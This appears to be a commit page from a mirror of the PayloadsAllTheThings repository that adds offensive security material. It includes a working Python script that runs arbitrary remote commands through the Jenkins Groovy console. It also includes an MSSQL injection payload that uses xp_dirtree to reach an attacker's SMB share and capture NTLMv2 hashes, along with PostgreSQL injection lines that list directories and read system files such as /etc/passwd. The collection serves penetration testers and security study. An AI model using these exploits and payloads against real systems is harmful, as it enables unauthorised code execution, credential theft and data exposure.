ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Jenkins Grrovy + MSSQL UNC + PostgreSQL list files

Browse Source
This commit is contained in:
Swissky 2019-02-17 20:02:16 +01:00
parent eac421432a
commit 78c882fb34
4 changed files with 46 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
CVE Exploits/Jenkins Groovy Console.py Normal file
View File

@ -0,0 +1,30 @@
#!/usr/bin/env python
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
import requests
import sys
print """
Jenkins Groovy Console cmd runner.
usage: ./jgc.py [HOST]
Then type any command and wait for STDOUT output from remote machine.
Type 'exit' to exit :)
"""
URL = sys.argv[1] + '/scriptText'
HEADERS = {
'User-Agent': 'jgc'
}
while 1:
CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ")
if CMD == 'exit':
print "exiting...\n"
exit(0)
DATA = {
'script': 'println "{}".execute().text'.format(CMD)
}
result = requests.post(URL, headers=HEADERS, data=DATA)
print result.text

5
Methodology and Resources/Active Directory Attack.md
View File

@ -68,6 +68,11 @@
```
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
* [Ping Castle](https://github.com/vletoux/pingcastle)
```powershell
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
```
## Most common paths to AD compromise

8
SQL injection/MSSQL Injection.md
View File

@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```
## MSSQL UNC Path
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
```sql
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
```
## MSSQL Make user DBA (DB admin)
```sql

3
SQL injection/PostgreSQL Injection.md
View File

@ -26,9 +26,12 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
## PostgreSQL File Read
```sql
select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);
```
NOTE: ``pg_read_file` doesn't accept the `/` character.
```sql
CREATE TABLE temp(t TEXT);
COPY temp FROM '/etc/passwd';